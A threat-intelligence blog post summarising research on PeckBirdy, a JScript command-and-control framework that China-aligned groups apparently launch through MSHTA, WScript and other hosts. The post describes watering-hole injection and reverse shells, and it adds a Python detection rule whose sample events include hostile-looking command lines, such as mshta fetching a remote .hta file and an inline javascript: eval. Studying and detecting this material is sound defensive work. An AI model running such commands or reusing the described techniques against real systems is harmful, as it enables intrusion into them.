
PeckBirdy - A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups

PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities. Since 2023, we have been observing threat campaigns employing a previously unseen script-based command-and-control (C&C) framework which we named PeckBirdy, being used against Chinese gambling industries, as well as malicious activities targeting Asian government entities and private organizations. While tracking this framework, we identified at least two campaigns using PeckBirdy, which we were able to link to several China-aligned advanced persistent threat (APT) actors.

PeckBirdy is a script-based framework which, despite its advanced capabilities, is implemented in JScript, an old scripting language. This choice ensures that the framework can be launched in different execution environments via LOLBins (living-off-the-land binaries). That flexibility is why we observed PeckBirdy at several stages of the kill chain: as a watering-hole control server during the initial attack phase, as a reverse shell server during the lateral movement phase, and as a C&C server during the backdoor phase.

Beginning in 2023, we noticed multiple Chinese gambling websites being injected with malicious scripts that load content from remote servers. When victims visit these gambling websites, the injected scripts download and execute the main script of the PeckBirdy routine, allowing attackers to remotely deliver and execute JavaScript. This constitutes the first campaign we identified, which we are tracking under the name SHADOW-VOID-044. During July 2024, we observed another campaign primarily targeting Asian government entities and private organizations, which we track under the campaign name SHADOW-EARTH-045. In one case, the injection was on the login page of a government system, while in another incident we noticed the attacker using MSHTA to execute PeckBirdy as a remote access channel for lateral movement inside a private organization. The threat actor behind the attacks also developed a .NET executable to launch PeckBirdy via ScriptControl. These findings demonstrate the versatility of PeckBirdy’s design, which enables it to serve multiple purposes.

PeckBirdy can be executed in various environments, including browsers, MSHTA, WScript, Classic ASP, Node.js, and .NET (ScriptControl). To maximize PeckBirdy’s reach, its developer implemented it in an old scripting language, JScript (which follows ECMAScript 3), and designed it to support multiple communication protocols so that it works in each of these environments. The default method uses the WebSocket protocol to communicate with the PeckBirdy server. If WebSocket is not supported, it attempts to detect the presence of Adobe Flash, after which it creates a Flash ActiveX object to establish TCP socket communication. If neither of these methods is supported, PeckBirdy can fall back to the Comet and LocalComet methods, which are based on HTTP(S) and AJAX. The subsequent communication is encrypted using AES and then encoded with Base64, with the AES encryption key being the ATTACK ID value from the configuration.
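Because PeckBirdy is launched through script-host LOLBins such as MSHTA and WScript, a practical defensive control is to flag those hosts when they are handed a remote URL, an inline javascript:/vbscript: handler, or a script in a user-writable directory. The following Python is an added example written for this post, not code from the report or from the threat actor; the process-creation events and the 203.0.113.10 address are constructed sample values, not indicators from the campaign.

```python
import re
from pathlib import PureWindowsPath

# Script hosts named in the report as PeckBirdy launchers, plus cscript (wscript's console twin).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
INLINE_RE = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
WRITABLE_RE = re.compile(r"\\(Users\\Public|Temp|AppData|ProgramData)\\", re.IGNORECASE)

# Constructed sample process-creation events (hypothetical; not indicators from the report).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://203.0.113.10/index.hta"},
    {"pid": 4131, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //E:jscript C:\Users\Public\update.js"},
    {"pid": 4140, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "javascript:eval(x)"'},
    {"pid": 4155, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Scripts\inventory.vbs"},
    {"pid": 4200, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe http://example.com/notes.txt"},
]


def classify(event):
    """Return the reasons an event looks like script-host abuse (empty list if benign)."""
    image = PureWindowsPath(event["image"]).name.lower()
    if image not in SCRIPT_HOSTS:
        return []  # only script hosts are in scope for this rule
    cmd = event["cmdline"]
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("script host given a remote URL")
    if INLINE_RE.search(cmd):
        reasons.append("inline javascript:/vbscript: handler")
    if WRITABLE_RE.search(cmd):
        reasons.append("script loaded from user-writable path")
    return reasons


def find_suspicious(events):
    """Map pid -> reasons for every event that triggers at least one rule."""
    return {e["pid"]: r for e in events if (r := classify(e))}


if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

The path rule is deliberately narrow; tune the directory list and add a parent-process condition (for example, a browser or Office process spawning mshta.exe) to match your environment's baseline.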

The scripts we found included an exploitation script for the CVE-2020-16040 vulnerability affecting Google Chrome; scripts for social engineering pop-ups designed to deceive victims into downloading and executing malicious files; scripts for delivering additional backdoors that are executed via Electron JS; and scripts to establish reverse shells via TCP sockets. Based on the infrastructure owned by the threat actors, we identified two distinct modular backdoors, HOLODONUT and MKDOOR, linked to SHADOW-VOID-044. HOLODONUT is a .NET-based modular backdoor we found within the threat actor’s infrastructure. To execute HOLODONUT, the threat actors deployed a customized simple downloader, which we track as NEXLOAD, to retrieve the payload from the remote server.

For more details, read the complete article here.

This post is licensed under CC BY 4.0 by the author.